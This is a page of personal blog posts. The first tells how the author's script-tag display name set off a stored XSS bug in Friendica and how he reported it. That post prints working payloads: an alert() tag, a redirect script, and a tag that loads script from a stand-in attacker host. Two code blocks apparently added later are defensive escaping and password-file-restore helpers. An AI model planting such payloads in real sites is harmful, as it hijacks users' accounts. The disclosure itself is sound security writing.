Accidentally Hacking the Planet

Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:

<script type="text/javascript">alert("I was here.");</script>

Because I’m kind of a smartass, I later changed my Mastodon username to something similar:

<script>alert("Tek");</script>

Then I laughed about it with my geeky friends and promptly forgot all about the joke.

And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.

  • An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
  • The attack was simple: I changed my username to a bit of valid JavaScript.
  • All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
  • My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
<script src="https://hackerz.ru/badstuff.js">Hi</script>
  • The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.
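The bug above, as an added example (my own illustration, not Friendica's code): the same display name interpolated into an HTML template as-is and after escaping, plus a small check an instance admin could run over stored display names to find ones that would render as live markup. The template, `contains_markup` and `audit_names` are assumptions; the sample names are the ones from this post.

```python
import html
import re

# Display names from this post (constructed sample input, not data from any instance).
SAMPLE_NAMES = [
    "Tek",
    '<script>alert("Tek");</script>',
    '<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>',
]

# Assumed template: where the author's name lands in the timeline HTML.
TEMPLATE = '<span class="author">{name}</span>'


def render_unescaped(name):
    """Reproduces the bug: the name is dropped into the HTML exactly as stored,
    so a name that is a <script> tag becomes a real <script> tag."""
    return TEMPLATE.format(name=name)


def render_escaped(name):
    """The fix: escape the name so the browser shows it as literal text.
    quote=True also escapes " and ', which matters inside attributes."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


# Anything shaped like an HTML tag: <script ...>, </script>, <img ...>, etc.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def contains_markup(name):
    """Admin-side check: would an unescaping template turn this name into markup?"""
    return bool(TAG_RE.search(name))


def audit_names(names):
    """Return the stored names that need attention before (or after) patching."""
    return [n for n in names if contains_markup(n)]


def rendered_as_text(name):
    """Regression check for the template: the escaped output must not contain
    a script tag even when the name is one."""
    return "<script" not in render_escaped(name).lower()


if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print("unescaped:", render_unescaped(n))
        print("escaped:  ", render_escaped(n))
    print("names that would render as markup:", audit_names(SAMPLE_NAMES))
```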

That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.1 Satisfied that the right people had been notified, I went back to bed.

The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”2

My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:

<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>

It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.

I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.

To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.

It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.


  1. Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎

  2. Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎

Favorite apps: PastePal

I used to think the Copied clipboard manager for Apple devices was spiffy. I don’t know how or why, but that app disappeared from the Internet and the App Stores.

PastePal seems to be its spiritual successor. It works perfectly, it syncs across devices, and the pro version is a one-time, reasonable $15 purchase. It’s the only clipboard manager I’ve found that checks all those boxes.

Pianos.

I worked as a software developer with a strongly opinionated manager. He believed that we’d achieve Peak Programmer Productivity™️ by standardizing on one common desktop setup. Of course, that meant we’d all be writing Python code in Eclipse or some other similar abomination that he liked that month. This is for him.


From now on, we’ll all play the piano. This nonsense of everyone knowing a different instrument is costing us time and money. I’ve played the piano for years, and I know you’re going to like it.

Yes, you too, violinists. Vibrato? In my time as a pianist, I’ve never needed it.

Drums? A piano is a percussion instrument. How many kinds of percussion do we need? What’s that? No, they’re not that different. Tempo, rhythms, yes, yes, we’ll still have all that.

Huh, woodwinds. Good point. Well, there are more percussion and string players than woodwind…ists, so they can figure something out.

OK, we’re getting sidetracked here. Look, this is going to be good for you, too! There are more pianos than violins – yes, and clarinets… what’s that? Yes, and probably trumpets, too. Anyway, there are a lot of pianos. The next place you go will probably have a piano, so you’ll have a leg up if you ever leave here. Not that you would, am I right? But see, I’m only thinking of your careers.

Yes, I know we’re picking my favorite instrument. That’s a coincidence. I’ve looked into lots of instruments, but we can all agree that pianos have certain advantages that… Who threw that? Indoor voices, please! Anyway, I’ve looked into lots of instruments… no, I haven’t ever played a flute, but you’ll find that… no, I will not be shoving a piano there, thank you very much!

Alright, meeting’s over. Pianos. That’s what we’re all using, starting — hey, I don’t appreciate that language. Let’s all act like professional adults here.

Pianos.

eero + Firewalla = perfection

I built our home Wi-Fi network on eero Pro 6 mesh routers. It’s great. I love it. It works as advertised. If your household is like most others, where no one has specific highly technical needs, stop reading this and buy an eero system. I’ve recommended them to my friends and family with lots of happy feedback.

However, our needs are specific and highly technical. Making and fixing computer networks is a significant chunk of my job. Information security is another huge chunk of it. We host servers in our house. And soon, our ISP1 will upgrade our Internet connection from 1Gbps to 10Gbps. eero has a few issues that complicate these uses:

  1. A persistent DHCP bug gives out the gateway eero’s own IP as a DNS server (where it acts as a proxy), even if I configure custom DNS servers. This means that when I had a Pi-hole, most requests appeared to come from the eero itself and not the individual devices. Forget applying custom blocking policies to specific devices because there’s no way to distinguish them.
  2. Hairpin NAT regularly breaks. If a device uses DNS to connect to a machine behind the eero gateway, say with Plex on an iPad configured to watch videos stored on a home server, it often works when I bring that device home and connect it to the same Wi-Fi as that server. For a while, at least. And then it won’t until I remember to reboot the whole network.
  3. The eero Pro 6 unit only has gigabit Ethernet jacks. If your Internet connection is faster than that, too bad. The newer eero Pro 6E units have single 2.5Gbps Ethernet jacks, which is almost worse. Although the gateway eero itself can have a 2.5Gbps Internet connection, it can’t share the full speed of that connection with any other device.
  4. Its firewall settings are limited. I can either allow all remote hosts to connect to a specific port on an internal server, or not allow any hosts. I can’t define rules like “allow connections to port 8080 from host A.B.C.D”, or “block connections from North Korea”. In practice, this means I have to set the eero to allow all traffic, then configure another firewall app on my server to enforce more tailored rules.

Enter the Firewalla Gold Plus. It’s a freestanding firewall device with four 2.5Gbps Ethernet jacks, and a phone (and web!) user interface that is as easy to use as eero’s. I’ve plugged the Firewalla directly into our Internet connection, and the eero gateway plugs into the Firewalla. I put the eero network into bridge mode so it only has to handle the Wi-Fi mesh network. The Firewalla assumed all routing and firewall duties. The setup works perfectly:

  1. Firewalla’s DHCP is more configurable and works correctly. Its DNS incorporates a lot of Pi-hole’s functions like ad blocking and local DNS.
  2. Hairpin NAT works perfectly, or at least it hasn’t broken yet in the few weeks since we got the device. I can connect to myserver.example.com from my living room as easily as from Starbucks without reconfiguring anything when I travel between those networks.
  3. I don’t have the equipment to test Firewalla’s highest throughput yet. The box could max out at 1.1Gbps for all I could prove today. However, I doubt it. I can run benchmarks that pass 1Gbps of traffic in through 1 port and out through another without effort. Even if the Firewalla could only pass exactly 2.500Gbps through to the Internet connection, that would allow devices connected to the eero gateway to download at its current full 1Gbps speed while the new, separate wired LAN is also pulling another 1.5Gbps through it. For future improvement, it can bond pairs of Ethernet ports together to act as 5Gbps ports. That’s not the top speed of the 10Gbps Internet connection, but it’s faster than any devices I own today.
  4. The firewall settings are vastly more sophisticated. I can open inbound ports to specific IPs or subnets, named groups of hosts, or geographical regions. I can also block outbound connections. And unlike with eero, I get a detailed report of blocked and allowed connections.

If I didn’t host a home server, or if I weren’t quite so super-nitpicky about security settings, or if our brilliant ISP wasn’t upgrading our connection from “hella fast” to “that’s just ridiculous”, our eero network would be fine as-is. I still happily recommend it to everyone I know. And despite my few complaints, I didn’t need to add a Firewalla to our working system. That said, I’m happy I did. It elevated our already excellent little network to blissfulness.


  1. If you live somewhere with Sonic Internet access, get it. Their service is fast, inexpensive, reliable, doesn’t have data caps, and supports net neutrality. ↩︎

Wake up, little sunshine

I prompted ChatGPT with: “Write a song I can sing to my son to get him awake and moving to get ready for school.”

It replied with:

Verse 1
Wake up, little sunshine
There’s a new day dawning
You’ve got a big adventure
It’s time to get moving

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Verse 2
Stretch out your arms and legs
Take a deep breath and smile
You’ll make new friends today
And learn so much in a while

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Bridge
The world is waiting for you
To see all that you can do
So let’s start this day together
And make it great, no matter the weather

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Outro
Wake up, little sunshine
It’s time to start your day
With a bright new adventure
You’ll find your own way.

Said son, who is 15, seemed to appreciate me waking him up by belting this out in full operatic tenor. I’m almost sure of it, despite any shouting to the contrary.

The Internet is a rough neighborhood

This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.

A screenshot of blocked inbound connection attempts, originating from all over the world.

Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.

“I run my service on a custom port!” Doesn’t matter.

“I use IPv6!” Doesn’t matter.

“I’m just a nobody!” Doesn’t matter.

Practice safer networking, every time, all the time.

Fox News fired Tucker Carlson

However it’s spun, Fox News fired Tucker Carlson. Carlson had the most popular cable news show by a wide margin, and it’s inconceivable that Fox would simply “part ways” with their highest earner, with zero notice, without cause.

Hint: it’s never good to cost your employer a billion dollars — not that Carlson is the only miscreant at Fox.

Integrate Things with Focus

I use the Things task manager to keep track of what I need to do. I use the Focus pomodoro timer to help myself focus on a task that I’m actively working on.

Focus integrates well with another task manager, OmniFocus: you can drag an action from OmniFocus into Focus to create a task to work on, and that task will have a button that links back to the original OmniFocus action. Super convenient! It doesn’t play well with Things, though. If you try the same process, you’ll end up with multiple separate actions for each of the Things to-do’s various properties.

For example, this to-do has the title, note, checklist, tags, when, and deadline options filled in:

A Things to-do with lots of options set

Dragging it to Focus creates a whole mess of random tasks:

Focus with 8 unrelated tasks

That’s not helpful. We can do better.

First, I wrote a shortcut using Things’s shiny new Shortcuts actions. For each to-do currently selected in Things, it uses Focus’s URL scheme to create a Focus task with the item’s title, notes, and due date, and a link back to the item in Things.

Second, I made a Keyboard Maestro hot key macro, available only in Things, that executes my shortcut. When I select the to-do item above and press “option-F”, I get one single task with all the details set:

Focus with 1 well-configured task

If I click the link icon next to the task’s title, Things opens with that to-do selected.

Ta-da! The workflow is slightly different than with OmniFocus, but only a little bit, and the result is just as useful.

Apple won't totally block unwanted emails

Apple’s email apps and services don’t allow users to completely block senders. If someone is sending you messages you don’t want to receive, tough. You’re going to get them.

The iCloud.com website’s Mail app doesn’t have a sender block mechanism. Instead, it offers a way to create rules based on each message’s attributes, such as its sender. Rules support these actions:

  • Move to Folder
  • Move to Trash
  • Forward to
  • Mark as Read
  • Move to Folder and Mark as Read
  • Move to Trash and Mark as Read
  • Forward to an Email Address and Mark as Read

None of those actions are the same as bouncing or silently discarding an email. At most, you can have the email sent to your Trash folder.

Mail.app on a Mac allows you to mark senders as “blocked”. You can configure Mail.app’s junk mail filters to either “Mark [their message] as blocked mail, but leave it in my Inbox” or “Move it to the Trash”. Again, you can’t bounce or discard it.

I tried to be clever and write an AppleScript program to delete messages from my Mac’s Trash folder. That was a dead end because AppleScript’s idea of deleting an email is moving it to Trash, even if it’s already in there. Neither does it offer a way to automatically empty the trash.

Apple, this is disappointing. If I’m blocking someone, I don’t want to hear from them at all, ever. It’s not enough to send their messages to the Trash folder. I don’t want them to be in my email account at all.

Upgrade your Raspberry Pi with an SSD

I upgraded my Raspberry Pi to use an external SSD drive instead of its built-in SD card reader. If you use your little computer for anything non-trivial, so should you.

For boring old dd sequential reads, the SSD is several times faster than the SD card:


A Boston Terrier Married a Cat

I prompted ChatGPT: “Write a Shakespearean sonnet about a Boston terrier marrying a cat.”

It replied:

“Oh, wondrous sight! A terrier and cat
In love, declaring bonds that none can break
Though some may scoff, and others may bark flat
Their love is true, not just a mere mistake

The terrier, bold and loyal as can be
Protects his feline bride with all his might
And she, with purrs and nuzzles, shows with glee
That this odd couple won’t give up the fight

They nap together, groom each other’s fur
And playfully chase one another around
To some, their pairing might seem quite absurd
But their love for each other knows no bound

So let them wed, and let their love be strong
For true love, no matter who, can’t be wrong”

Our inevitable robot overlords can write delightful poetry. We’re in trouble.

Easily copy file contents with ForkLift

I use the ForkLift 3 file manager on my Mac. Part of my job involves copying-and-pasting the contents of various files into web forms. I made a trivial little shell script so ForkLift can help me:

#!/bin/sh

# Copy the contents of exactly one file to the macOS clipboard.
if [ $# -ne 1 ]; then
    echo "Expected exactly 1 filename." >&2
    exit 1
fi

pbcopy < "$1"

Then I created a new “Tool” called “Contents to Clipboard” that calls the script with the name of the selected file.

/Users/me/bin/copy_contents.sh $SOURCE_SELECTION_PATHS

Now I can select a file, select the Commands > Contents to Clipboard menu, and voila! The file’s contents are ready to be pasted into another app.

Recovering a Raspberry Pi password on an M1 Mac

I would never accidentally change my Raspberry Pi’s account password before clicking “save” in my password manager, therefore locking myself out. But let’s say, hypothetically, that I did. How would I get back into my account?

The process would look like:

  • Power off the Raspberry Pi.
  • Eject its SD card.
  • Put the SD card in my M1 Mac.
  • Magically replace the Pi’s /etc/shadow file with the previous /etc/shadow- version, undoing the password change.
  • Put the SD card back in my Pi.
  • Power up, log in, and pat myself on the back.

Hypothetically, that magic bit could be a pain in the neck.

False start #1: ext4fuse

The relevant part of the Pi’s SD card is formatted with the ext4 filesystem. macOS doesn’t natively support ext4, and I’d need to install software so that I could access and edit the files on the card.

First, I’d install the open source ext4fuse program and navigate to the Pi’s /etc directory. Only then would I realize that ext4fuse is a read-only filesystem and doesn’t support writing at all.

False start #2: extFS for Mac

If the open source option didn’t work, I’d try the paid extFS for Mac filesystem and use its trial offer to do the work.

After installation, I’d discover that something in the way that the Pi formats its SD card prevents extFS from mounting it.

False start #3: run Debian in a VirtualBox VM

I bet by then I’d give up on mounting the filesystem inside macOS, and accept that it’d be easier to do the work inside a Linux VM. I’d likely hold my nose and download Oracle’s VirtualBox. Bummer that it doesn’t work well on M1 Macs yet, which I’d learn would cause the Debian installer to reboot every couple of minutes.

Success at last: Parallels Desktop

After trying and ruling out everything else, I’d probably try the trial version of Parallels Desktop. I’d use it to install Debian, then go to the Devices > USB & Bluetooth > Apple SDXC Reader Media (disk6) menu to mount the Pi’s SD card inside the VM. Then I’d open the VM’s Terminal app and run:

cd /media/parallels/root/etc
sudo mv shadow shadow.bak
sudo cp shadow- shadow

Finally, I’d go into the VM’s Files app and unmount the “boot”, “root”, and “SETTINGS” disks.
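The same shadow restore as a helper with the checks I’d want around it (an added example, not part of the original post): it refuses to run without a shadow- backup, reports which accounts’ hashes actually differ, keeps the current file as shadow.bak, and explicitly restores the original file’s mode and owner rather than relying on whatever cp and the VM user’s umask produce. The directory argument is the mounted /etc; the demo below builds a constructed one in a temp directory with fake hashes.

```python
import os
import shutil
import tempfile
from pathlib import Path


def _read_hashes(path):
    """Map account name -> password hash field from a shadow-format file."""
    hashes = {}
    for line in Path(path).read_text().splitlines():
        if line.strip():
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    return hashes


def changed_accounts(etc_dir):
    """Accounts whose hash differs between shadow and the shadow- backup."""
    etc = Path(etc_dir)
    current = _read_hashes(etc / "shadow")
    previous = _read_hashes(etc / "shadow-")
    return sorted(u for u in current if previous.get(u) != current[u])


def restore_shadow(etc_dir):
    """Replace shadow with shadow-, keeping shadow.bak and the original mode/owner.
    Returns the accounts whose hashes were rolled back."""
    etc = Path(etc_dir)
    shadow, backup, saved = etc / "shadow", etc / "shadow-", etc / "shadow.bak"
    if not backup.is_file():
        raise FileNotFoundError(f"{backup} missing; nothing to restore from")
    rolled_back = changed_accounts(etc)
    st = shadow.stat()                        # remember mode/owner before touching it
    shutil.move(shadow, saved)                # same as: sudo mv shadow shadow.bak
    shutil.copy2(backup, shadow)              # same as: sudo cp shadow- shadow
    os.chmod(shadow, st.st_mode & 0o777)      # 0640 on Debian-based systems
    os.chown(shadow, st.st_uid, st.st_gid)    # root:shadow, not the VM user's defaults
    return rolled_back


def build_demo_etc(directory):
    """Constructed shadow and shadow- files for a dry run; the hashes are fake."""
    etc = Path(directory)
    etc.mkdir(parents=True, exist_ok=True)
    old = "root:*:19000:0:99999:7:::\npi:$6$OLDSALT$oldfakehash:19000:0:99999:7:::\n"
    new = "root:*:19000:0:99999:7:::\npi:$6$NEWSALT$newfakehash:19100:0:99999:7:::\n"
    (etc / "shadow-").write_text(old)
    (etc / "shadow").write_text(new)
    os.chmod(etc / "shadow", 0o640)
    return etc


def run_demo():
    """Dry run in a temp dir; returns the facts worth checking afterwards."""
    etc = build_demo_etc(Path(tempfile.mkdtemp()) / "etc")
    before = (etc / "shadow").read_text()
    rolled_back = restore_shadow(etc)
    return {
        "rolled_back": rolled_back,
        "restored_matches_backup": (etc / "shadow").read_text() == (etc / "shadow-").read_text(),
        "bak_matches_original": (etc / "shadow.bak").read_text() == before,
        "mode": oct((etc / "shadow").stat().st_mode & 0o777),
    }


if __name__ == "__main__":
    print(run_demo())
```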

Crossing my fingers

After all that, I’d pop the card out, stick it back in the Raspberry Pi, boot it, log in via SSH, and run sudo -s. At the password prompt, I’d type my original password (as stored in my password manager), then exhale in relief as I was once again able to log in.

That is, if I were to lock myself out in the first place. Which I never would. Because I’m a professional.

I watched the Tyre Nichols video

I watched the Tyre Nichols video. I didn’t want to because I knew what it was going to contain and dreaded the idea of seeing it, but I felt obligated to. A man died at the hands of the authorities, and as a citizen, I should witness what our government is doing. Even if — especially if — that government is accused of committing horrible acts.

I’m not glad I saw it. I wish I could un-see it. I don’t resent anyone else who doesn’t want to see it. There’s no lesser way to describe it: Demetrius Haley, Tadarrius Bean, Emmitt Martin III, Desmond Mills Jr., and Justin Smith murdered Nichols. Yes, he initially ran from the traffic stop. He should not have done that. But running from a traffic stop is not and should not be a capital offense that warrants the death penalty. After the officers had him safely detained, they proceeded to tase, pepper spray, kick, punch, and use a baton to beat him to death while he called for his mom. Anyone who claims to have seen that video and says that he deserved it or defends the officers’ actions in any way is either lying about seeing it, an irredeemable bootlicker, or a sociopath.

I grew up with the privilege of not fearing the police. Sure, I didn’t want them around if I was getting up to mischief, but I believed the worst that could happen was that they’d catch me and a court would punish me for it. Nichols didn’t have that privilege. He was right to be afraid of his police, and although it’s easy for me to say that he shouldn’t have run from them, it turned out that his fears were justified.

My travel project template

In an older post, I talked about making a project template for trip planning. The goal is to build a comprehensive list of everything I might want to prepare, pack, or do before, during, or after a business or vacation trip. Before I made this template, I was more anxious: Did I forget to do anything? Do I have everything I need? What am I missing? Now I can relax and concentrate on the fun times ahead.

Friends have asked me for my list to use as a starting point for their own, and this is that lightly annotated list. Regrets from past adventures inspired every item. The moment I’ve booked a trip, I copy this template into my to-do app, then delete everything that doesn’t apply this time. For instance, if I’m going to visit family, I can use their pillow instead of packing my own. If I’m going to Chicago in winter, I don’t need swimming trunks. If I’m traveling for personal reasons, I may not take my work laptop. It’s much easier to remove items I don’t need than to scramble to remember the things I do need.

As always, the “update the travel template” action near the bottom is the critical feedback loop that makes this all work. Every time I’ve wished I’d done or packed something, I made a reminder to add it to the list for the next time. If I were to start over with a new template having that as the only item, after a few trips that template would look a lot like this one.

As soon as travel is planned

  • Schedule time off at work 1
  • Call the vet to make pet boarding arrangements

Three weeks before travel

  • Ensure airline has TSA Pre✓ info

One week before travel

  • Notify the bank about travel 2
  • Buy travel toothpaste
  • Buy disposable razors
  • Buy travel shaving cream

Two days before travel

  • Get passports from safe
  • Check in to flight
  • Get $40 from an ATM 3
  • Download reading material 4
  • Stop eating spicy food 5

Day before travel

  • Charge the USB battery 6
  • Pack pants
  • Pack shirts
  • Pack undershirts
  • Pack underwear
  • Pack socks
  • Pack shoes
  • Pack jacket
  • Pack sandals
  • Pack shorts
  • Pack belts
  • Pack a wearing-around hat 7
  • Pack swim trunks
  • Pack a sun hat
  • Pack a sun shirt
  • Pack gaffers tape 8
  • Pack water bottle
  • Download podcasts and meditations 9
  • Pack dopp kit 10
    • $20 bill
    • Brush/comb
    • Hair gel
    • Deodorant
    • Bottle of shampoo
    • Bar of soap
    • Razor
    • Shaving cream
    • Toothbrush
    • Toothpaste
    • Floss
    • Lip balm
    • Nail clippers
    • Sewing kit
    • Safety pins
    • Curtain clips 11
    • Eye lotion
    • Meds and vitamins
    • Q-tips
    • Eye drops
    • Gold Bond powder 12
  • Pack first aid kit
    • Band-aids
    • Blister bandages 13
    • Ibuprofen
    • Melatonin 14
    • Allergy meds
    • Indigestion medicine

Night before travel

  • Put passport card in bag
  • Put backup credit card in bag 15
  • Set wake-up alarm
  • Charge laptop
  • Charge iPhone
  • Charge iPad
  • Charge Apple Watch
  • Charge AirPods
  • Charge Switch
  • Remove TSA-unfriendly stuff from bag 16
  • Pack USB battery
  • Pack passport book in suitcase 15
  • Pack handkerchief
  • Pack food bar
  • Pack AirPods
  • Pack Switch
  • Pack magazine for plane 4
  • Pack boarding passes
  • Pack sunglasses
  • Pack journal

Day of travel

  • Wear my Apple Watch
  • Turn on Fog of World 17
  • Set the thermostat to vacation mode 18
  • Pack laptop charger
  • Pack iPhone charging cable
  • Pack iPad charging cable
  • Pack Apple Watch charging cable
  • Pack USB charger’s charging cable
  • Pack AirPods charging cable
  • Pack multi-device charger
  • Pack laptop
  • Pack iPhone
  • Pack iPad
  • Pack pillow
  • Buy airport stickers 19

The day before return

  • Check in to return flight

The day of return

  • Buy airport stickers
  • Set the thermostat to normal mode
  • Put away passports
  • Update the travel template 20

After return

  • Submit travel reimbursement request 21
  • Look for travel reimbursement check 22

  1. This seems obvious but I always forget. ↩︎

  2. If you don’t do this, your bank may see transactions from an unusual location and freeze your debit or credit card. ↩︎

  3. I’ve never regretted having walking around money while traveling. ↩︎

  4. If I didn’t have something to read on a flight, I’d lose my mind. ↩︎ ↩︎

  5. Yes, the Thai curry native-extra-hot is delicious. Do you really want to be trapped in a plane while your stomach tries to digest it? ↩︎

  6. I take a plug-in charging block and a portable USB battery. If my phone is running low in the middle of a long flight, I can still charge it with the battery. ↩︎

  7. It’s vacation. I want to throw on a hat to step out for coffee or breakfast. ↩︎

  8. Ideal for covering obnoxiously bright power LEDs in hotel rooms, blocking light under the door, etc. ↩︎

  9. If it’s too bumpy to read, it’s nice to have something fun or relaxing to listen to. ↩︎

  10. See “Building the Perfect Dopp Kit”. ↩︎

  11. Hotel curtains never seem to close all the way. Bend them to your will. ↩︎

  12. Ever been rained on, had to walk around a lot in wet pants, and gotten chafed from it? Yeah, me neither. ↩︎

  13. “Ow, these new shoes are killing my feet and I’m walking way more than usual.” ↩︎

  14. Jet lag. Strange hotel. Travel excitement. These add up to difficulty sleeping. ↩︎

  15. Carry at least 2 forms of ID and 2 forms of payment in 2 separate places. If 1 set gets stolen, you still have the other to get home. ↩︎ ↩︎

  16. I have a tiny multi-tool in my EDC bag, and I don’t want the TSA to confiscate it. ↩︎

  17. This is a fun little app that records everywhere you’ve been. ↩︎

  18. Save money not heating or cooling your house as much while you’re away from it. ↩︎

  19. I collect them for my carryon suitcase. This is in here twice in case I have a different layover on the way home. ↩︎

  20. I take notes of things I wish I’d done or packed. When I get home I immediately update the list so that I won’t forget next time. ↩︎

  21. Do it while you still have all the receipts in one place. ↩︎

  22. Once the office has reimbursed me, the trip is officially done. ↩︎

Muradin wallet doesn't block RFID

My wife bought me a cool Muradin RFID-blocking wallet for Christmas. I like it a lot, except for the fact that it doesn’t actually block RFID if you use it as advertised.

The wallet has a roomy inside “cage” for storing cards, and an external pocket for storing your “frequently used card”:

The wallet with a credit card in the outside pocket.

That’s not just my interpretation of the photo. The site goes on to explicitly say that the outside pocket is for your card:

A credit card in the "FUC (frequently used card) exterior pocket"

But what does our handy dandy Flipper Zero think of the wallet’s claim? Not much. It had no trouble reading the numbers off my debit card in the “FUC exterior pocket”:

A Flipper Zero showing redacted credit card info.

To see if orientation mattered, I rotated my card 180° and tried again. It didn’t matter:

A Flipper Zero showing more redacted credit card info.

I went on to test with single cards inside the inner compartment. If the card was against the back of the wallet, as far as possible from the protective flap, the Flipper Zero couldn’t detect it.

If the card was on top of some non-RFID contents, like a few folded dollar bills, so that it was about halfway down inside the inner compartment, I could tell with about 90% reliability whether the card was a Visa or American Express:

A Visa card is inside the wallet.

Now an American Express card is inside the wallet.

If the card was on top of several pieces of non-RFID content, and pushed up to the top of the inner compartment, I could scan its number through the “RFID-blocking” wallet about 50% of the time, depending on the card.

This wallet doesn’t work. Its RFID-blocking claim is somewhere between misleading and an outright lie. Don’t buy it.

Happy 2023!

2022 was a whirlwind of disasters, plagues, wars, elections, recession, inflation, and other stressors. It was a challenging year. If it had a theme, it would be “oh, now what?” However, we survived it, even if bruised and scarred.

This year is going to be better. I know it.

Happy 2023!

SteerMouse makes my Logitech mouse better

I bought a Logitech MX Vertical Wireless Mouse last year. The mouse itself remains delightful and my carpal tunnel aches have disappeared. I’m a fan.

Logitech’s “Options” (and newer “Options+”) driver software isn’t as lovely. Besides its odd issues, such as old versions being incompatible with FileVault, it’s a “large” app for something that mainly maps button presses to actions. It has a jarring, non-Mac-like interface, and supports a lot of features I’ll never use.

Enter SteerMouse. Let’s get the price out of the way: yes, I’m talking about a $20 app to replace the free one that comes with my mouse. It’s worth it. SteerMouse only configures the mouse speed, button-to-action mappings, and other directly mouse-related settings, and it does that well. It’s installed as a System Settings pane, looking and feeling almost like it shipped with the computer. Unlike Options, it doesn’t like to call home to its maker (thanks, Little Snitch!), and it lets me map the top button to a helpful action (instead of using it to switch between 2 speed settings, which I never once did).

In short, buy it. It’s better, lighter, more native, and more private than Logitech’s software. Even at $20, I recommend it.

Audrey Auden's "The Voice in All"

I read Audrey Auden’s new book, “The Voice in All”, the first in her new “The Artifex and the Muse” series. Auden creates a lush, complex world filled with interesting, multifaceted residents. Tantalizing glimpses of science fiction sneak into the fantasy setting, hinting at a rich universe for the rest of the series. “The Voice in All” packs a surprising amount of development and story into a quick, fun book. Auden’s piqued my interest and I’m looking forward to the next installments.